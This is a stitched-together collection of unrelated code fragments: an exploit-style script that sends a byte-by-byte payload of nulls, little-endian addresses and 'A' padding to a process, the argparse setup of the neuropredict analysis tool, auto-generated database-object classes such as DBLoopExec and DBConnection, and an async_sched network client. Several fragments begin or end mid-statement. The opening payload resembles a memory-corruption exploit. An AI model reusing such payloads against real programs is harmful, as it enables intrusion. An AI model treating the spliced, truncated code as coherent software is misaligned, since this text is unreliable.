proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x48')
# input state (offset = 1)
proc.send(b'\x2e')
# input state (offset = 1)
proc.send(b'\x40')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\xa0')
# input state (offset = 1)
proc.send(b'\x13')
# input state (offset = 1)
proc.send(b'\x40')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
| |
"""
neuropredict : easy and comprehensive predictive analysis.
"""
from __future__ import print_function
__all__ = ['run', 'cli', 'get_parser']
import argparse
import os
import sys
import textwrap
import traceback
import warnings
import matplotlib
import matplotlib.pyplot as plt
from sys import version_info
from os.path import join as pjoin, exists as pexists, abspath, realpath, basename
import numpy as np
from pyradigm import MLDataset
if version_info.major > 2:
# the order of import is very important to avoid circular imports
from neuropredict import __version__
from neuropredict import config_neuropredict as cfg
from neuropredict import rhst, visualize
from neuropredict.freesurfer import aseg_stats_subcortical, aseg_stats_whole_brain
from neuropredict.io import get_metadata, get_features, get_metadata_in_pyradigm, \
get_data_matrix, get_dir_of_dirs, get_pyradigm, get_arff, saved_dataset_matches
from neuropredict.utils import check_paths, uniq_combined_name, check_num_procs, sub_group_identifier, \
save_options, load_options, validate_feature_selection_size, make_dataset_filename, not_unspecified
else:
raise NotImplementedError('neuropredict requires Python 3+.')
def get_parser():
"Parser to specify arguments and their defaults."
parser = argparse.ArgumentParser(prog="neuropredict", formatter_class=argparse.RawTextHelpFormatter,
description='Easy, standardized and comprehensive predictive analysis.')
help_text_fs_dir = textwrap.dedent("""
Absolute path to ``SUBJECTS_DIR`` containing the finished runs of Freesurfer parcellation
Each subject will be queried after its ID in the metadata file.
E.g. ``--fs_subject_dir /project/freesurfer_v5.3``
\n \n """)
help_text_user_defined_folder = textwrap.dedent("""
List of absolute paths to user's own features.
Format: Each of these folders contains a separate folder for each subject (named after its ID in the metadata file)
containing a file called features.txt with one number per line.
All the subjects (in a given folder) must have the number of features (#lines in file).
Different parent folders (describing one feature set) can have different number of features for each subject,
but they must all have the same number of subjects (folders) within them.
Names of each folder is used to annotate the results in visualizations.
Hence name them uniquely and meaningfully, keeping in mind these figures will be included in your papers.
For example,
.. parsed-literal::
--user_feature_paths /project/fmri/ /project/dti/ /project/t1_volumes/
Only one of ``--pyradigm_paths``, ``user_feature_paths``, ``data_matrix_path`` or ``arff_paths`` options can be specified.
\n \n """)
help_text_pyradigm_paths = textwrap.dedent("""
Path(s) to pyradigm datasets.
Each path is self-contained dataset identifying each sample, its class and features.
\n \n """)
help_text_data_matrix = textwrap.dedent("""
List of absolute paths to text files containing one matrix of size N x p (num_samples x num_features).
Each row in the data matrix file must represent data corresponding to sample in the same row
of the meta data file (meta data file and data matrix must be in row-wise correspondence).
Name of this file will be used to annotate the results and visualizations.
E.g. ``--data_matrix_paths /project/fmri.csv /project/dti.csv /project/t1_volumes.csv ``
Only one of ``--pyradigm_paths``, ``user_feature_paths``, ``data_matrix_path`` or ``arff_paths`` options can be specified.
File format could be
- a simple comma-separated text file (with extension .csv or .txt): which can easily be read back with
numpy.loadtxt(filepath, delimiter=',')
or
- a numpy array saved to disk (with extension .npy or .numpy) that can read in with numpy.load(filepath).
One could use ``numpy.savetxt(data_array, delimiter=',')`` or ``numpy.save(data_array)`` to save features.
File format is inferred from its extension.
\n \n """)
help_text_arff_paths = textwrap.dedent("""
List of paths to files saved in Weka's ARFF dataset format.
Note:
- this format does NOT allow IDs for each subject.
- given feature values are saved in text format, this can lead to large files with high-dimensional data,
compared to numpy arrays saved to disk in binary format.
More info: https://www.cs.waikato.ac.nz/ml/weka/arff.html
\n \n """)
help_text_positive_class = textwrap.dedent("""
Name of the positive class (e.g. Alzheimers, MCI etc) to be used in calculation of area under the ROC curve.
Applicable only for binary classification experiments.
Default: class appearing last in order specified in metadata file.
\n \n """)
help_text_train_perc = textwrap.dedent("""
Percentage of the smallest class to be reserved for training.
Must be in the interval [0.01 0.99].
If sample size is sufficiently big, we recommend 0.5.
If sample size is small, or class imbalance is high, choose 0.8.
\n \n """)
help_text_num_rep_cv = textwrap.dedent("""
Number of repetitions of the repeated-holdout cross-validation.
The larger the number, more stable the estimates will be.
\n \n """)
help_text_sub_groups = textwrap.dedent("""
This option allows the user to study different combinations of classes in a multi-class (N>2) dataset.
For example, in a dataset with 3 classes CN, FTD and AD,
two studies of pair-wise combinations can be studied separately
with the following flag ``--sub_groups CN,FTD CN,AD``.
This allows the user to focus on few interesting subgroups depending on their dataset/goal.
Format: Different subgroups must be separated by space,
and each sub-group must be a comma-separated list of class names defined in the meta data file.
Hence it is strongly recommended to use class names without any spaces, commas, hyphens and special characters,
and ideally just alphanumeric characters separated by underscores.
Any number of subgroups can be specified, but each subgroup must have atleast two distinct classes.
Default: ``'all'``, leading to inclusion of all available classes in a all-vs-all multi-class setting.
\n \n """)
help_text_metadata_file = textwrap.dedent("""
Abs path to file containing metadata for subjects to be included for analysis.
At the minimum, each subject should have an id per row followed by the class it belongs to.
E.g.
.. parsed-literal::
sub001,control
sub002,control
sub003,disease
sub004,disease
\n \n """)
help_text_feature_selection = textwrap.dedent("""Number of features to select as part of feature selection.
Options:
- 'tenth'
- 'sqrt'
- 'log2'
- 'all'
Default: \'tenth\' of the number of samples in the training set.
For example, if your dataset has 90 samples, you chose 50 percent for training (default),
then Y will have 90*.5=45 samples in training set, leading to 5 features to be selected for taining.
If you choose a fixed integer, ensure all the feature sets under evaluation have atleast that many features.
\n \n """)
help_text_gs_level = textwrap.dedent("""
Flag to specify the level of grid search during hyper-parameter optimization on the training set.
Allowed options are : 'none', 'light' and 'exhaustive', in the order of how many values/values will be optimized.
More parameters and more values demand more resources and much longer time for optimization.
The 'light' option tries to "folk wisdom" to try least number of values (no more than one or two),
for the parameters for the given classifier. (e.g. a lage number say 500 trees for a random forest optimization).
The 'light' will be the fastest and should give a "rough idea" of predictive performance.
The 'exhaustive' option will try to most parameter values for the most parameters that can be optimized.
""")
help_text_make_vis = textwrap.dedent("""
Option to make visualizations from existing results in the given path.
This is helpful when neuropredict failed to generate result figures automatically
e.g. on a HPC cluster, or another environment when DISPLAY is either not available.
""")
help_text_atlas = textwrap.dedent("""
Name of the atlas to use for visualization. Default: fsaverage, if available.
\n \n """)
help_text_num_cpus = textwrap.dedent("""
Number of CPUs to use to parallelize CV repetitions.
Default : 4.
Number of CPUs will be capped at the number available on the machine if higher is requested.
\n \n """)
help_text_out_dir = textwrap.dedent("""
Output folder to store gathered features & results.
\n \n """)
help_classifier = textwrap.dedent("""
String specifying one of the implemented classifiers.
(Classifiers are carefully chosen to allow for the comprehensive report provided by neuropredict).
Default: 'RandomForestClassifier'
""")
help_feat_select_method = textwrap.dedent("""
Feature selection method to apply prior to training the classifier.
Default: 'VarianceThreshold', removing features with 0.001 percent of lowest variance (zeros etc).
""")
parser.add_argument("-m", "--meta_file", action="store", dest="meta_file",
default=None, required=False, help=help_text_metadata_file)
parser.add_argument("-o", "--out_dir", action="store", dest="out_dir", required=False, help=help_text_out_dir,
default=None )
parser.add_argument("-f", "--fs_subject_dir", action="store", dest="fs_subject_dir",
default=None, help=help_text_fs_dir)
user_defined = parser.add_argument_group(title='Input data and formats',
description='Only one of the following types can be specified.')
user_defined.add_argument("-y", "--pyradigm_paths", action="store", dest="pyradigm_paths",
nargs='+', # to allow for multiple features
default=None,
help=help_text_pyradigm_paths)
user_defined.add_argument("-u", "--user_feature_paths", action="store", dest="user_feature_paths",
nargs='+', # to allow for multiple features
default=None,
help=help_text_user_defined_folder)
user_defined.add_argument("-d", "--data_matrix_paths", action="store", dest="data_matrix_paths",
nargs='+',
default=None,
help=help_text_data_matrix)
user_defined.add_argument("-a", "--arff_paths", action="store", | |
= completed
    def db_change_completed(self, completed):
        # Generated change hook: overwrite the flag without touching is_dirty.
        self._db_completed = completed
    def db_delete_completed(self, completed):
        # Generated delete hook: the argument is ignored; the field is cleared.
        self._db_completed = None
    def __get_db_name(self):
        # Property getter backing the generated db_name property.
        return self._db_name
    def __set_db_name(self, name):
        # Property setter: assigning through db_name marks the object modified.
        self._db_name = name
        self.is_dirty = True
    db_name = property(__get_db_name, __set_db_name)
    def db_add_name(self, name):
        # Generated add hook: scalar field, so this is a plain assignment.
        self._db_name = name
    def db_change_name(self, name):
        # Generated change hook: overwrite without touching is_dirty.
        self._db_name = name
    def db_delete_name(self, name):
        # Generated delete hook: argument ignored, field cleared.
        self._db_name = None
    def getPrimaryKey(self):
        # The primary key of this object is its generated id field.
        return self._db_id
class DBLoopExec(object):
    """Auto-generated persistence object for a 'loop_exec' log entry.

    Holds scalar fields (id, ts_start, ts_end, completed, error) plus two
    child collections (module_execs, group_execs), each mirrored by an
    id-keyed index dict and a deleted-children list. ``is_dirty`` /
    ``is_new`` flags support incremental persistence.

    NOTE(review): the accessor loops below use ``xrange``, which exists only
    in Python 2 — confirm the target runtime before reuse under Python 3.
    """
    vtType = 'loop_exec'
    def __init__(self, id=None, ts_start=None, ts_end=None, completed=None, error=None, module_execs=None, group_execs=None):
        self._db_id = id
        self._db_ts_start = ts_start
        self._db_ts_end = ts_end
        self._db_completed = completed
        self._db_error = error
        # Child module executions, with an id -> object index kept in sync.
        self.db_deleted_module_execs = []
        self.db_module_execs_id_index = {}
        if module_execs is None:
            self._db_module_execs = []
        else:
            self._db_module_execs = module_execs
            for v in self._db_module_execs:
                self.db_module_execs_id_index[v.db_id] = v
        # Child group executions, indexed the same way.
        self.db_deleted_group_execs = []
        self.db_group_execs_id_index = {}
        if group_execs is None:
            self._db_group_execs = []
        else:
            self._db_group_execs = group_execs
            for v in self._db_group_execs:
                self.db_group_execs_id_index[v.db_id] = v
        # Freshly constructed objects are both new and unsaved.
        self.is_dirty = True
        self.is_new = True
    def __copy__(self):
        return DBLoopExec.do_copy(self)
    def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
        # Deep copy of this object and its children; when new_ids is True,
        # fresh ids are drawn from id_scope and the old->new mapping is
        # recorded in id_remap.
        cp = DBLoopExec(id=self._db_id,
                        ts_start=self._db_ts_start,
                        ts_end=self._db_ts_end,
                        completed=self._db_completed,
                        error=self._db_error)
        if self._db_module_execs is None:
            cp._db_module_execs = []
        else:
            cp._db_module_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_module_execs]
        if self._db_group_execs is None:
            cp._db_group_execs = []
        else:
            cp._db_group_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_group_execs]
        # set new ids
        if new_ids:
            new_id = id_scope.getNewId(self.vtType)
            if self.vtType in id_scope.remap:
                id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
            else:
                id_remap[(self.vtType, self.db_id)] = new_id
            cp.db_id = new_id
        # recreate indices and set flags
        cp.db_module_execs_id_index = dict((v.db_id, v) for v in cp._db_module_execs)
        cp.db_group_execs_id_index = dict((v.db_id, v) for v in cp._db_group_execs)
        if not new_ids:
            cp.is_dirty = self.is_dirty
            cp.is_new = self.is_new
        return cp
    @staticmethod
    def update_version(old_obj, trans_dict, new_obj=None):
        # Schema migration: copy each field from old_obj into new_obj, letting
        # a per-class translation function from trans_dict override any field.
        if new_obj is None:
            new_obj = DBLoopExec()
        class_dict = {}
        if new_obj.__class__.__name__ in trans_dict:
            class_dict = trans_dict[new_obj.__class__.__name__]
        if 'id' in class_dict:
            res = class_dict['id'](old_obj, trans_dict)
            new_obj.db_id = res
        elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
            new_obj.db_id = old_obj.db_id
        if 'ts_start' in class_dict:
            res = class_dict['ts_start'](old_obj, trans_dict)
            new_obj.db_ts_start = res
        elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
            new_obj.db_ts_start = old_obj.db_ts_start
        if 'ts_end' in class_dict:
            res = class_dict['ts_end'](old_obj, trans_dict)
            new_obj.db_ts_end = res
        elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
            new_obj.db_ts_end = old_obj.db_ts_end
        if 'completed' in class_dict:
            res = class_dict['completed'](old_obj, trans_dict)
            new_obj.db_completed = res
        elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
            new_obj.db_completed = old_obj.db_completed
        if 'error' in class_dict:
            res = class_dict['error'](old_obj, trans_dict)
            new_obj.db_error = res
        elif hasattr(old_obj, 'db_error') and old_obj.db_error is not None:
            new_obj.db_error = old_obj.db_error
        # Children are migrated recursively through their own update_version.
        if 'module_execs' in class_dict:
            res = class_dict['module_execs'](old_obj, trans_dict)
            for obj in res:
                new_obj.db_add_module_exec(obj)
        elif hasattr(old_obj, 'db_module_execs') and old_obj.db_module_execs is not None:
            for obj in old_obj.db_module_execs:
                new_obj.db_add_module_exec(DBModuleExec.update_version(obj, trans_dict))
        if hasattr(old_obj, 'db_deleted_module_execs') and hasattr(new_obj, 'db_deleted_module_execs'):
            for obj in old_obj.db_deleted_module_execs:
                n_obj = DBModuleExec.update_version(obj, trans_dict)
                new_obj.db_deleted_module_execs.append(n_obj)
        if 'group_execs' in class_dict:
            res = class_dict['group_execs'](old_obj, trans_dict)
            for obj in res:
                new_obj.db_add_group_exec(obj)
        elif hasattr(old_obj, 'db_group_execs') and old_obj.db_group_execs is not None:
            for obj in old_obj.db_group_execs:
                new_obj.db_add_group_exec(DBGroupExec.update_version(obj, trans_dict))
        if hasattr(old_obj, 'db_deleted_group_execs') and hasattr(new_obj, 'db_deleted_group_execs'):
            for obj in old_obj.db_deleted_group_execs:
                n_obj = DBGroupExec.update_version(obj, trans_dict)
                new_obj.db_deleted_group_execs.append(n_obj)
        new_obj.is_new = old_obj.is_new
        new_obj.is_dirty = old_obj.is_dirty
        return new_obj
    def db_children(self, parent=(None,None), orphan=False):
        # Collect (object, parent_type, parent_id) triples for this object and
        # all descendants; with orphan=True, children are detached afterwards.
        children = []
        to_del = []
        for child in self.db_module_execs:
            children.extend(child.db_children((self.vtType, self.db_id), orphan))
            if orphan:
                to_del.append(child)
        for child in to_del:
            self.db_delete_module_exec(child)
        to_del = []
        for child in self.db_group_execs:
            children.extend(child.db_children((self.vtType, self.db_id), orphan))
            if orphan:
                to_del.append(child)
        for child in to_del:
            self.db_delete_group_exec(child)
        children.append((self, parent[0], parent[1]))
        return children
    def db_deleted_children(self, remove=False):
        # Return (and optionally clear) the lists of deleted children.
        children = []
        children.extend(self.db_deleted_module_execs)
        children.extend(self.db_deleted_group_execs)
        if remove:
            self.db_deleted_module_execs = []
            self.db_deleted_group_execs = []
        return children
    def has_changes(self):
        # Dirty if this object or any child has unsaved modifications.
        if self.is_dirty:
            return True
        for child in self._db_module_execs:
            if child.has_changes():
                return True
        for child in self._db_group_execs:
            if child.has_changes():
                return True
        return False
    # --- generated scalar-field properties and add/change/delete hooks ---
    # Property setters mark the object dirty; the bare hooks do not.
    def __get_db_id(self):
        return self._db_id
    def __set_db_id(self, id):
        self._db_id = id
        self.is_dirty = True
    db_id = property(__get_db_id, __set_db_id)
    def db_add_id(self, id):
        self._db_id = id
    def db_change_id(self, id):
        self._db_id = id
    def db_delete_id(self, id):
        self._db_id = None
    def __get_db_ts_start(self):
        return self._db_ts_start
    def __set_db_ts_start(self, ts_start):
        self._db_ts_start = ts_start
        self.is_dirty = True
    db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
    def db_add_ts_start(self, ts_start):
        self._db_ts_start = ts_start
    def db_change_ts_start(self, ts_start):
        self._db_ts_start = ts_start
    def db_delete_ts_start(self, ts_start):
        self._db_ts_start = None
    def __get_db_ts_end(self):
        return self._db_ts_end
    def __set_db_ts_end(self, ts_end):
        self._db_ts_end = ts_end
        self.is_dirty = True
    db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
    def db_add_ts_end(self, ts_end):
        self._db_ts_end = ts_end
    def db_change_ts_end(self, ts_end):
        self._db_ts_end = ts_end
    def db_delete_ts_end(self, ts_end):
        self._db_ts_end = None
    def __get_db_completed(self):
        return self._db_completed
    def __set_db_completed(self, completed):
        self._db_completed = completed
        self.is_dirty = True
    db_completed = property(__get_db_completed, __set_db_completed)
    def db_add_completed(self, completed):
        self._db_completed = completed
    def db_change_completed(self, completed):
        self._db_completed = completed
    def db_delete_completed(self, completed):
        self._db_completed = None
    def __get_db_error(self):
        return self._db_error
    def __set_db_error(self, error):
        self._db_error = error
        self.is_dirty = True
    db_error = property(__get_db_error, __set_db_error)
    def db_add_error(self, error):
        self._db_error = error
    def db_change_error(self, error):
        self._db_error = error
    def db_delete_error(self, error):
        self._db_error = None
    # --- module_execs collection: list plus id index kept in lock-step ---
    def __get_db_module_execs(self):
        return self._db_module_execs
    def __set_db_module_execs(self, module_execs):
        self._db_module_execs = module_execs
        self.is_dirty = True
    db_module_execs = property(__get_db_module_execs, __set_db_module_execs)
    def db_get_module_execs(self):
        return self._db_module_execs
    def db_add_module_exec(self, module_exec):
        self.is_dirty = True
        self._db_module_execs.append(module_exec)
        self.db_module_execs_id_index[module_exec.db_id] = module_exec
    def db_change_module_exec(self, module_exec):
        # Replace the entry with a matching db_id, or append if absent.
        self.is_dirty = True
        found = False
        for i in xrange(len(self._db_module_execs)):
            if self._db_module_execs[i].db_id == module_exec.db_id:
                self._db_module_execs[i] = module_exec
                found = True
                break
        if not found:
            self._db_module_execs.append(module_exec)
        self.db_module_execs_id_index[module_exec.db_id] = module_exec
    def db_delete_module_exec(self, module_exec):
        # Remove by db_id; already-persisted entries are kept in the deleted
        # list so their removal can be propagated to storage.
        self.is_dirty = True
        for i in xrange(len(self._db_module_execs)):
            if self._db_module_execs[i].db_id == module_exec.db_id:
                if not self._db_module_execs[i].is_new:
                    self.db_deleted_module_execs.append(self._db_module_execs[i])
                del self._db_module_execs[i]
                break
        del self.db_module_execs_id_index[module_exec.db_id]
    def db_get_module_exec(self, key):
        # Linear lookup by db_id (index-free fallback).
        for i in xrange(len(self._db_module_execs)):
            if self._db_module_execs[i].db_id == key:
                return self._db_module_execs[i]
        return None
    def db_get_module_exec_by_id(self, key):
        return self.db_module_execs_id_index[key]
    def db_has_module_exec_with_id(self, key):
        return key in self.db_module_execs_id_index
    # --- group_execs collection: same pattern as module_execs ---
    def __get_db_group_execs(self):
        return self._db_group_execs
    def __set_db_group_execs(self, group_execs):
        self._db_group_execs = group_execs
        self.is_dirty = True
    db_group_execs = property(__get_db_group_execs, __set_db_group_execs)
    def db_get_group_execs(self):
        return self._db_group_execs
    def db_add_group_exec(self, group_exec):
        self.is_dirty = True
        self._db_group_execs.append(group_exec)
        self.db_group_execs_id_index[group_exec.db_id] = group_exec
    def db_change_group_exec(self, group_exec):
        # Replace the entry with a matching db_id, or append if absent.
        self.is_dirty = True
        found = False
        for i in xrange(len(self._db_group_execs)):
            if self._db_group_execs[i].db_id == group_exec.db_id:
                self._db_group_execs[i] = group_exec
                found = True
                break
        if not found:
            self._db_group_execs.append(group_exec)
        self.db_group_execs_id_index[group_exec.db_id] = group_exec
    def db_delete_group_exec(self, group_exec):
        self.is_dirty = True
        for i in xrange(len(self._db_group_execs)):
            if self._db_group_execs[i].db_id == group_exec.db_id:
                if not self._db_group_execs[i].is_new:
                    self.db_deleted_group_execs.append(self._db_group_execs[i])
                del self._db_group_execs[i]
                break
        del self.db_group_execs_id_index[group_exec.db_id]
    def db_get_group_exec(self, key):
        for i in xrange(len(self._db_group_execs)):
            if self._db_group_execs[i].db_id == key:
                return self._db_group_execs[i]
        return None
    def db_get_group_exec_by_id(self, key):
        return self.db_group_execs_id_index[key]
    def db_has_group_exec_with_id(self, key):
        return key in self.db_group_execs_id_index
    def getPrimaryKey(self):
        # The primary key of this object is its generated id field.
        return self._db_id
class DBConnection(object):
vtType = 'connection'
def __init__(self, id=None, ports=None):
self._db_id = id
self.db_deleted_ports = []
self.db_ports_id_index = {}
self.db_ports_type_index = {}
if ports is None:
self._db_ports = []
else:
self._db_ports = ports
for v in self._db_ports:
self.db_ports_id_index[v.db_id] = v
self.db_ports_type_index[v.db_type] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBConnection.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBConnection(id=self._db_id)
if self._db_ports is None:
cp._db_ports = []
else:
cp._db_ports = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_ports]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_ports_id_index = dict((v.db_id, v) for v in cp._db_ports)
cp.db_ports_type_index = dict((v.db_type, v) for v in cp._db_ports)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBConnection()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ports' in class_dict:
res = class_dict['ports'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_port(obj)
elif hasattr(old_obj, 'db_ports') and old_obj.db_ports is not None:
for obj in old_obj.db_ports:
new_obj.db_add_port(DBPort.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_ports') and hasattr(new_obj, 'db_deleted_ports'):
for obj in old_obj.db_deleted_ports:
n_obj = DBPort.update_version(obj, trans_dict)
new_obj.db_deleted_ports.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_ports:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_port(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_ports)
if remove:
self.db_deleted_ports = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_ports:
if child.has_changes():
return True
return False
    def __get_db_id(self):
        # Property getter for db_id.
        return self._db_id
    def __set_db_id(self, id):
        # Property setter for db_id: every assignment marks the object
        # dirty so it gets written back on the next save.
        self._db_id = id
        self.is_dirty = True
    db_id = property(__get_db_id, __set_db_id)
| |
import asyncio
from typing import Union, Tuple
from serial_json import DataClass
from async_sched.utils import get_loop
from async_sched.schedule import Schedule
from async_sched.server.messages import Quit, Update, RunCommand, ScheduleCommand, ListSchedules, StopSchedule
__all__ = ['Client',
'quit_server_async', 'quit_server', 'update_server_async', 'update_server', 'request_schedules_async',
'request_schedules', 'run_command_async', 'run_command', 'schedule_command_async', 'schedule_command',
'stop_schedule_async', 'stop_schedule']
class Client(object):
    """Client that sends commands to a remote ``async_sched`` server.

    Messages are serial_json ``DataClass`` objects encoded as JSON.  Every
    request method writes one message, waits for one response frame,
    prints the server's reply, and returns the parsed response object.

    Args:
        addr (str/tuple)[None]: Server hostname or an ``(ip, port)`` tuple.
        port (int)[8000]: Server port, used when *addr* does not carry one.
        loop (asyncio.AbstractEventLoop)[None]: Optional event loop override.
    """

    READ_SIZE = 4096  # Maximum number of bytes read for a single response.

    def __init__(self, addr: Union[str, Tuple[str, int]] = None, port: int = 8000,
                 loop: asyncio.AbstractEventLoop = None):
        # Normalize addr into an (ip, port) pair.
        if not isinstance(addr, (list, tuple)):
            addr = (addr, port)
        if len(addr) == 1:
            addr = addr + (port,)

        self._loop = loop
        self.reader = None
        self.writer = None
        self._is_connected = False

        self.ip_address = addr[0]
        self.port = addr[1]

    @property
    def loop(self) -> 'asyncio.AbstractEventLoop':
        """Return the explicit loop if one was given, else the shared loop."""
        if self._loop is not None:
            return self._loop
        return get_loop()

    @loop.setter
    def loop(self, loop: asyncio.AbstractEventLoop):
        self._loop = loop

    async def is_connected(self):
        """Return if the client is connected"""
        return self._is_connected

    def start(self, addr: Union[str, Tuple[str, int]] = None, port: int = None, **kwargs) -> 'Client':
        """Add a task to start running the server forever."""
        self.server_task = self.loop.create_task(self.start_async(addr=addr, port=port, **kwargs), name='client')
        return self

    async def start_async(self, addr: Union[str, Tuple[str, int]] = None, port: int = None, **kwargs):
        """Open the connection, optionally overriding the saved address.

        Args:
            addr (str/tuple)[None]: Hostname or ``(ip, port)`` override.
            port (int)[None]: Port override.
            **kwargs: Extra arguments for ``asyncio.open_connection``.
        """
        if isinstance(addr, (list, tuple)):
            if len(addr) > 0:
                self.ip_address = addr[0]
            if len(addr) > 1:
                self.port = addr[1]
        elif isinstance(addr, str):
            self.ip_address = addr
        if isinstance(port, int):
            self.port = port

        self.reader, self.writer = await asyncio.open_connection(self.ip_address, self.port, **kwargs)
        # BUGFIX: _is_connected was never updated, so is_connected() and the
        # context managers could not tell an open connection from a closed one.
        self._is_connected = True
        return self

    async def stop_async(self):
        """Close the connection and release the stream objects."""
        if self.writer is not None:
            self.writer.close()
            await self.writer.wait_closed()
        self.writer = None
        self.reader = None
        self._is_connected = False
        return self

    async def _request(self, msg):
        """Send *msg*, print the server's reply, and return the parsed response.

        Shared implementation for the simple one-request/one-response
        commands below.
        """
        self.writer.write(msg.json().encode())
        await self.writer.drain()

        data = await self.reader.read(self.READ_SIZE)
        message = DataClass.from_json(data)
        print(f'{message.message}')
        return message

    async def send_quit(self):
        """Send the quit command."""
        return await self._request(Quit())

    async def send_update(self, module_name: str = ''):
        """Send the update command.

        Args:
            module_name (str)['']: Module name to import/reload. If blank import/reload all modules.
        """
        return await self._request(Update(module_name=module_name))

    async def request_schedules(self, print_results=True):
        """Request, optionally print, and return the list of schedules."""
        self.writer.write(ListSchedules().json().encode())
        await self.writer.drain()

        data = await self.reader.read(self.READ_SIZE)
        if not data:
            # The server may deliver an empty first frame; read once more.
            data = await self.reader.read(self.READ_SIZE)

        message = DataClass.from_json(data)
        if print_results:
            print('Running Schedules:')
            for running in message.schedules:
                print(f'    {running.name} = {running.schedule}')
        return message

    async def run_command(self, callback_name, *args, **kwargs):
        """Run the given command name on the remote server."""
        return await self._request(RunCommand(callback_name=callback_name, args=args, kwargs=kwargs))

    async def schedule_command(self, name: str, schedule: 'Schedule', callback_name, *args, **kwargs):
        """Schedule a command to run on the remote server."""
        msg = ScheduleCommand(name=name, schedule=schedule,
                              callback_name=callback_name, args=args, kwargs=kwargs)
        return await self._request(msg)

    async def stop_schedule(self, name: str):
        """Stop a running schedule."""
